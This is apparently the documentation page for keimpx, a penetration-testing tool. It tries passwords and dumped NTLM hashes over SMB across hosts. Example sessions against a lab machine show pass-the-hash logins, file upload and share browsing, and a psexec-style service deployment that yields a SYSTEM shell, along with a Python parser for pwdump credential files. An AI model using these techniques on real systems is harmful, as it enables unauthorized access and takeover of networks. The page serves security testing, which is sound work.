The Web Local
 

 

 

keimpx

 

keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for the usefulness of credentials across a network over SMB. As the options listed under Syntax show, credentials can be:

- a username and plain-text password (-U and -P)
- a username and LM/NT hash pair (-U with --lm and --nt), so that hashes dumped from another host can be tried without cracking them
- a file of credentials (-c) holding pwdump/fgdump-style user:rid:LM:NT::: lines, "user password" lines, or a mix of both

Every credential is tried against every target (one address with -t, or a file of them with -l), optionally for each domain given with -D or -d, using up to -T simultaneous connections.

If any valid credentials have been discovered across the network after the attack phase, the user is asked to choose which host to connect to and which valid credentials to use, and is then dropped into an interactive SMB shell from which the user can:

- list and connect to shares, browse directories, and read, download, upload and delete files
- deploy and undeploy a service executable on the target
- spawn a command prompt running as NT AUTHORITY\SYSTEM through a temporary service (the shell command)
- enumerate users, the password policy and the domains the host belongs to

Batch mode (-b) skips the interactive prompt and only reports which credentials worked.

 

 

It is available from here

 

Pre-requisites

 

Python

py2exe (available from here; only needed to build a standalone Windows executable)

impacket (available from here)

pycrypto (available from here)

The last three pre-requisites are each installed from their unpacked source directory with: python setup.py install

 

Syntax

 

C:\keimpx-0.2>python keimpx.py -h

keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>

Usage: keimpx.py [options]

Options:
  --version       show program's version number and exit
  -h, --help      show this help message and exit
  -v VERBOSE      Verbosity level: 0-2 (default 0)
  -t TARGET       Target address
  -l LIST         File with list of targets
  -U USER         User
  -P PASSWORD     Password
  --nt=NTHASH     NT hash
  --lm=LMHASH     LM hash
  -c CREDSFILE    File with list of credentials
  -D DOMAIN       Domain
  -d DOMAINSFILE  File with list of domains
  -p PORT         SMB port: 139 or 445 (default 445)
  -n NAME         Local hostname
  -T THREADS      Maximum simultaneous connections (default 10)
  -b              Batch mode: do not ask to get an interactive SMB shell

 

Examples

 

Test only for usefulness of a single username/plain-text password pair on a single system; -b (batch mode) reports the result without offering a shell afterwards

$ python keimpx.py -t 172.16.77.130 -U Administrator -P testpass -v 1 -b
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>

[16:49:35] [INFO] Loading targets
[16:49:35] [INFO] Loading credentials
[16:49:35] [INFO] Loading domains
[16:49:35] [INFO] Loaded 1 unique targets
[16:49:35] [INFO] Loaded 1 unique credentials
[16:49:35] [INFO] No domains specified, using NULL domain
[16:49:35] [INFO] Attacking host 172.16.77.130:445
[16:49:35] [INFO] Valid credentials on 172.16.77.130:445: Administrator/testpass
[16:49:35] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 1 times

TARGET SORTED RESULTS:

172.16.77.130:445
Administrator/testpass

USER SORTED RESULTS:

Administrator/testpass
172.16.77.130:445

$

Test for usefulness of dumped hashes on a single system and interact with it afterwards. The credentials file mixes fgdump output lines with a cracked plain-text pair; the Guest line, whose hash fields read NO PASSWORD, is tried as a blank password, and the number in parentheses after a failed attempt is the SMB error code the server returned (2239 is ERRaccountExpired: the account is disabled or has expired, which is the default state of Guest).

$ cat /tmp/hashes_and_plain
# Lines output of fgdump
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass

$ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v 1
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>

[15:53:23] [INFO] Loading targets
[15:53:23] [INFO] Loading credentials
[15:53:23] [INFO] Loading domains
[15:53:23] [INFO] Loaded 1 unique targets
[15:53:23] [INFO] Loaded 4 unique credentials
[15:53:23] [INFO] No domains specified, using NULL domain
[15:53:23] [INFO] Attacking host 172.16.77.130:445
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[15:53:23] [INFO] Wrong credentials on 172.16.77.130:445: Guest/BLANK (2239)
[15:53:23] [INFO] Valid credentials on 172.16.77.130:445: testuser/testpass
[15:53:23] [INFO] Attack on host 172.16.77.130:445 finished

The credentials worked in total 3 times

TARGET SORTED RESULTS:

172.16.77.130:445
Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
testuser/testpass

USER SORTED RESULTS:

Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
172.16.77.130:445

ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
172.16.77.130:445

testuser/testpass
172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 1
Which credentials do you want to use to connect?
[1] Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[2] ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[3] testuser/testpass
> 3
[15:53:46] [INFO] type 'help' for help menu
# shares
[1] print$ (type: 0, comment: Printer Drivers)
[2] C$ (type: 0, comment: Default share)
[3] CanonMP9 (type: 1, comment: Canon MP980 series Printer)
[4] share (type: 0, comment: )
[5] C (type: 0, comment: )
[6] CanonMP9.2 (type: 1, comment: Canon MP980 series Printer (Copy 1))
[7] IPC$ (type: 3, comment: Remote IPC)
[8] ADMIN$ (type: 0, comment: Remote Admin)
Which share do you want to connect to? (default 1) 2
# dir
Wed Sep 19 10:11:41 2007 AUTOEXEC.BAT
Sat Sep 12 15:38:04 2009 208 boot.ini
[...]
# exit
$
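The credentials file used above mixes two line layouts: fgdump/pwdump records (user:rid:LM:NT:::, where NO PASSWORD marks an empty hash field) and plain "user password" pairs, and keimpx reports the Guest record as Guest/BLANK. The parser below is an added illustration of that format, written for this page rather than taken from keimpx's source. It assumes only those two layouts (a colon-separated user:password line is not handled), the exact-duplicate rule behind "Loaded N unique credentials" is an assumption, and the to_args helper, which maps an entry onto the single-credential -U/-P/--lm/--nt options, is hypothetical.

```python
import re
from typing import List, NamedTuple, Optional

_HEX32 = re.compile(r"^[0-9A-Fa-f]{32}$")


class Credential(NamedTuple):
    user: str
    password: Optional[str]  # plain-text ("" for blank); None when only hashes are known
    lmhash: Optional[str]
    nthash: Optional[str]

    def label(self) -> str:
        """Same user/secret form as the 'Valid credentials on ...' log lines."""
        if self.password is not None:
            return f"{self.user}/{self.password or 'BLANK'}"
        return f"{self.user}/{self.lmhash}:{self.nthash}"

    def to_args(self) -> List[str]:
        """Hypothetical helper: the equivalent single-credential keimpx options."""
        if self.password is not None:
            return ["-U", self.user, "-P", self.password]
        return ["-U", self.user, "--lm", self.lmhash, "--nt", self.nthash]


def _hash_field(field: str) -> str:
    """fgdump/pwdump writes 'NO PASSWORD****...' when a hash field is empty."""
    field = field.strip()
    if field.upper().startswith("NO PASSWORD"):
        return ""
    if not _HEX32.match(field):
        raise ValueError(f"not a 32-hex-digit hash: {field!r}")
    return field.upper()


def parse_line(line: str) -> Optional[Credential]:
    """One line -> Credential, or None for blank lines and '#' comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(":")
    if len(parts) >= 4:
        # pwdump layout: user:rid:LM:NT:::  (the RID plays no part in authentication)
        user, lm, nt = parts[0], _hash_field(parts[2]), _hash_field(parts[3])
        if lm == "" and nt == "":
            # Both fields empty: try a blank password, as the "Guest/BLANK" log line shows
            return Credential(user, "", None, None)
        return Credential(user, None, lm, nt)
    # Whitespace-separated "user password" layout; a missing password means blank
    tokens = line.split(None, 1)
    return Credential(tokens[0], tokens[1] if len(tokens) == 2 else "", None, None)


def load_credentials(text: str) -> List[Credential]:
    """Parse a whole file, dropping exact duplicates (assumed dedup rule)."""
    seen, creds = set(), []
    for raw in text.splitlines():
        cred = parse_line(raw)
        if cred is not None and cred not in seen:
            seen.add(cred)
            creds.append(cred)
    return creds


# The file from the example above, embedded so the block runs offline.
SAMPLE = """\
# Lines output of fgdump
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
ASPNET:1003:F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
# Cracked plain-text password
testuser testpass
"""

if __name__ == "__main__":
    for cred in load_credentials(SAMPLE):
        print(cred.label(), " ".join(cred.to_args()))
```

Run as-is it prints the four entries in the same user/secret form the log above uses, which makes it easy to diff a prepared file against what keimpx reports as loaded before launching an attack.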

Test for usefulness of dumped hashes on a single system and spawn a command prompt afterwards. The shell command works in the manner of psexec: as the log below shows, it uploads a service executable to ADMIN$, creates and starts a throw-away service over the SVCCTL named pipe, and connects to the backdoor that service opens on TCP port 2090 (another port can be given as shell [port]). The prompt runs as NT AUTHORITY\SYSTEM, so the chosen credentials must be administrative on the target. On exit the service is stopped and deleted and the executable removed, but the file write and service creation are the kind of events host logging records.

$ python keimpx.py -t 172.16.77.130 -c /tmp/hashes_and_plain -v 1
[... same credentials file, attack phase and sorted results as in the previous example ...]
Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
> 1
Which credentials do you want to use to connect?
[1] Administrator/0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210
[2] ASPNET/F9E4566E60BF54D2C5CBAB2825145C99:6CD9B3F3132973F0A7825B81E4191C68
[3] testuser/testpass
> 1
[15:53:46] [INFO] type 'help' for help menu
# shell
[16:53:07] [INFO] Uploading the service executable to 'ADMIN$\ihtell.exe'
[16:53:07] [INFO] Connecting to the SVCCTL named pipe
[16:53:07] [INFO] Creating the service 'uYRYKB'
[16:53:07] [INFO] Starting the service 'uYRYKB'
[16:53:07] [INFO] Connecting to backdoor on port 2090, wait..
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 3:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 172.16.77.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.77.2

C:\WINDOWS\system32>exit
exit
[16:53:20] [INFO] Connecting to the SVCCTL named pipe
[16:53:20] [INFO] Stopping the service 'uYRYKB'
[16:53:20] [INFO] Deleting the service 'uYRYKB'
[16:53:20] [INFO] Removing the service executable 'ADMIN$\ihtell.exe'
# exit
$

Use a valid pair of credentials to interact with the system afterwards. Without -v the attack phase is not logged; an empty answer at the target and credentials prompts selects the only entry, and help lists what the SMB shell offers.

$ python keimpx.py -t 172.16.77.130 -U Administrator -P validpassword
This product includes software developed by CORE Security Technologies
(http://www.coresecurity.com), Python Impacket library

keimpx 0.2
by Bernardo Damele A. G. <bernardo.damele@gmail.com>


The credentials worked in total 1 times

TARGET SORTED RESULTS:

172.16.77.130:445
Administrator/validpassword


USER SORTED RESULTS:

Administrator/validpassword
172.16.77.130:445

Do you want to get a shell from any of the targets? [Y/n] y
Which target do you want to connect to?
[1] 172.16.77.130:445
>
Which credentials do you want to use to connect?
[1] Administrator/validpassword
>
# help
Generic options
===============
help - show this message
verbosity {level} - set verbosity level (0-2)
info - list system information
exit - terminates the SMB session and exit from the tool

Shares options
==============
shares - list available shares
use {sharename} - connect to a specific share
cd {path} - changes the current directory to {path}
pwd - shows current remote directory
ls {path} - lists all the files in the current directory
cat {file} - display content of the selected file
download {filename} - downloads the filename from the current path
upload {filename} - uploads the filename into the current path
mkdir {dirname} - creates the directory under the current path
rm {file} - removes the selected file
rmdir {dirname} - removes the directory under the current path

Services options
================
deploy {service name} {local file} [service args] - deploy remotely a service executable
undeploy {service name} {remote file} - undeploy remotely a service executable

Shell options
=============
shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp

Users options
=============
users [domain] - list users, optionally for a specific domain
pswpolicy [domain] - list password policy, optionally for a specific domain
domains - list the domains the system is part of

Registry options (Soon)
================
regread {registry key} - read a registry key
regwrite {registry key} {registry value} - add a value to a registry key
regdelete {registry key} - delete a registry key

# shares
[1] print$ (type: 0, comment: Printer Drivers)
[2] C$ (type: 0, comment: Default share)
[3] CanonMP9 (type: 1, comment: Canon MP980 series Printer)
[4] share (type: 0, comment: )
[5] C (type: 0, comment: )
[6] CanonMP9.2 (type: 1, comment: Canon MP980 series Printer (Copy 1))
[7] IPC$ (type: 3, comment: Remote IPC)
[8] ADMIN$ (type: 0, comment: Remote Admin)
Which share do you want to connect to? (default 1) 2
# dir
Wed Sep 19 10:11:41 2007 AUTOEXEC.BAT
Sat Sep 12 15:38:04 2009 208 boot.ini
[...]
# cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /fastdetect /NoExecute=OptOut
# cd Windows\Temp
# dir
Fri Nov 6 18:30:15 2009 <DIR> .
Fri Nov 6 18:30:15 2009 <DIR> ..
Wed May 6 12:51:52 2009 <DIR> Cookies
Wed May 6 12:51:52 2009 <DIR> History
Wed May 6 12:51:52 2009 <DIR> Temporary Internet Files
# !ls      (a command prefixed with an exclamation mark runs on your local system, not the target)
contrib
keimpx.py
setup.py

# upload keimpx.py
# dir
Thu Nov 12 15:36:02 2009 <DIR> .
Thu Nov 12 15:36:02 2009 <DIR> ..
Wed May 6 12:51:52 2009 <DIR> Cookies
Wed May 6 12:51:52 2009 <DIR> History
Thu Nov 12 15:36:02 2009 45838 keimpx.py
Wed May 6 12:51:52 2009 <DIR> Temporary Internet Files
# users
Administrator
User ID: 500
Group ID: 513
Enabled: True
Logon count: 187
Last Logon: Thu, 12 Nov 2009 15:37:13
Kickoff: Mon, 14 Sep 2009 10:15:47
Password can change: Mon, 14 Sep 2009 10:15:47
Password must change: Infinity
Bad password count: 0
Logon hours: Unlimited
Account Name: Administrator
Description: Built-in account for administering the computer/domain
ASPNET
User ID: 1003
Group ID: 513
[...]
# domains
Domains:
W2K3DEV
Builtin
# exit
$

 
